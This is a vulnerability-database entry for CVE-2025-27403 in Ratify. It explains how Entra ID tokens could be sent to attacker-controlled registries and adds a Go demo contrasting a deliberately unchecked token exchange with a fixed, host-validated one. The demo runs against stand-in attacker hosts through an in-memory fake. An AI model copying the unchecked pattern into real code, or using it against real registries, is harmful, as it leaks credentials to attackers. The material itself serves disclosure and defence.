
Binbin-Li

#38737 of 53,634
7.2 Total CVSS
Vulnerabilities · 1
PT-2025-10764
7.2
2025-03-11
Ratify · Ratify · CVE-2025-27403
Name of the Vulnerable Software and Affected Versions: Ratify versions prior to 1.2.3 (1.2.x line) and Ratify versions prior to 1.3.2 (1.3.x line).

Description: Ratify is a verification engine for artifact security metadata. In a Kubernetes environment it can be configured to authenticate to a private Azure Container Registry (ACR) through its Azure workload identity and Azure managed identity authentication providers. Both providers obtain an Entra ID (EID) token and exchange it for an ACR refresh token at the registry named in the image reference. Before the fix, neither provider verified that the target registry was actually an ACR, so the EID token could be presented to a non-ACR registry during the token exchange. The registry is selected by the image reference, so a user workload whose image reference points at a registry under an attacker's control causes Ratify to send that attacker an EID token that carries ACR access; the token can then be extracted and abused.

Recommendations: For versions prior to 1.2.3, update to 1.2.3 or later; for versions prior to 1.3.2, update to 1.3.2 or later. Both releases add validation of the target registry before the EID token exchange. As a temporary workaround until the update is applied, restrict use of the Azure authentication providers, and do not admit workloads whose image references point at registries you do not trust, since the image reference is what chooses where the token is sent.
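The following Go program is an added example written for this page; it is not Ratify's own code. It shows the pre-fix pattern the description above talks about (post the EID token to whatever host the image reference named) beside the fixed pattern (check that the host belongs to an ACR first). The exchange endpoint, grant type and form fields follow ACR's documented oauth2/exchange API; the list of ACR DNS suffixes, the function names, the tenant and token values, and the in-memory fake registry that plays the attacker's server are all assumptions made for this example.

```go
package main

import (
	"context"
	"encoding/json"
	"errors"
	"fmt"
	"io"
	"net"
	"net/http"
	"net/url"
	"strings"
)

// ACR DNS suffixes (public cloud, China, US Government). Assumed for this
// example; the real allowlist would come from the cloud configuration.
var acrHostSuffixes = []string{".azurecr.io", ".azurecr.cn", ".azurecr.us"}

var ErrNotACR = errors.New("registry is not an Azure Container Registry; refusing to present Entra ID token")

// validateACRHost is the check the advisory describes as missing: the host in the
// image reference must be an ACR before an EID token is sent to it.
func validateACRHost(registry string) error {
	host := strings.ToLower(registry)
	if host == "" || strings.ContainsAny(host, "/@?#") {
		return fmt.Errorf("%w: %q is not a bare host", ErrNotACR, registry)
	}
	if h, _, err := net.SplitHostPort(host); err == nil {
		host = h // tolerate an explicit port such as myreg.azurecr.io:443
	}
	for _, suffix := range acrHostSuffixes {
		// Leading dot forces a label boundary: "myreg.azurecr.io.attacker.example"
		// and a bare "azurecr.io" both fail, "myreg.eastus.data.azurecr.io" passes.
		if strings.HasSuffix(host, suffix) && len(host) > len(suffix) {
			return nil
		}
	}
	return fmt.Errorf("%w: %q", ErrNotACR, registry)
}

// exchangeUnchecked is the vulnerable pattern: it posts the EID token to
// https://<registry>/oauth2/exchange for whatever registry was named.
func exchangeUnchecked(ctx context.Context, client *http.Client, registry, tenant, eidToken string) (string, error) {
	form := url.Values{
		"grant_type":   {"access_token"},
		"service":      {registry},
		"tenant":       {tenant},
		"access_token": {eidToken},
	}
	req, err := http.NewRequestWithContext(ctx, http.MethodPost,
		"https://"+registry+"/oauth2/exchange", strings.NewReader(form.Encode()))
	if err != nil {
		return "", err
	}
	req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
	resp, err := client.Do(req)
	if err != nil {
		return "", err
	}
	defer resp.Body.Close()
	if resp.StatusCode != http.StatusOK {
		return "", fmt.Errorf("exchange failed: %s", resp.Status)
	}
	var body struct {
		RefreshToken string `json:"refresh_token"`
	}
	if err := json.NewDecoder(resp.Body).Decode(&body); err != nil {
		return "", err
	}
	return body.RefreshToken, nil
}

// exchangeChecked is the fixed pattern: validate the target, then exchange.
func exchangeChecked(ctx context.Context, client *http.Client, registry, tenant, eidToken string) (string, error) {
	if err := validateACRHost(registry); err != nil {
		return "", err
	}
	return exchangeUnchecked(ctx, client, registry, tenant, eidToken)
}

// fakeRegistry is a constructed in-memory stand-in for whichever host the exchange
// reaches. Like a malicious registry it records the token it was handed; no network is used.
type fakeRegistry struct{ SeenHost, SeenToken string }

func (f *fakeRegistry) RoundTrip(req *http.Request) (*http.Response, error) {
	raw, _ := io.ReadAll(req.Body)
	vals, _ := url.ParseQuery(string(raw))
	f.SeenHost, f.SeenToken = req.URL.Host, vals.Get("access_token")
	return &http.Response{
		StatusCode: http.StatusOK,
		Header:     http.Header{"Content-Type": {"application/json"}},
		Body:       io.NopCloser(strings.NewReader(`{"refresh_token":"acr-refresh-token"}`)),
		Request:    req,
	}, nil
}

// demo runs both patterns against a fake registry named by the image reference and
// reports which token, if any, each pattern handed to it.
func demo(registry string) (uncheckedLeaked, checkedLeaked string, checkedErr error) {
	const eid = "eyJ.constructed-entra-id-token" // constructed placeholder, not a real token
	ctx := context.Background()
	unchecked, checked := &fakeRegistry{}, &fakeRegistry{}
	_, _ = exchangeUnchecked(ctx, &http.Client{Transport: unchecked}, registry, "tenant-id", eid)
	_, checkedErr = exchangeChecked(ctx, &http.Client{Transport: checked}, registry, "tenant-id", eid)
	return unchecked.SeenToken, checked.SeenToken, checkedErr
}

func main() {
	for _, reg := range []string{"myreg.azurecr.io", "evil.example.com", "myreg.azurecr.io.attacker.example"} {
		u, c, err := demo(reg)
		fmt.Printf("%-36s unchecked leaked=%t checked leaked=%t err=%v\n", reg, u != "", c != "", err)
	}
}
```

Running it shows the unchecked path presenting the EID token to every host, including the attacker-controlled ones, while the checked path only ever sends it to a host under an ACR suffix. The boundary cases are the ones worth keeping in a regression test: a host that merely contains "azurecr.io" as a label, a host with a path appended, and an explicit port.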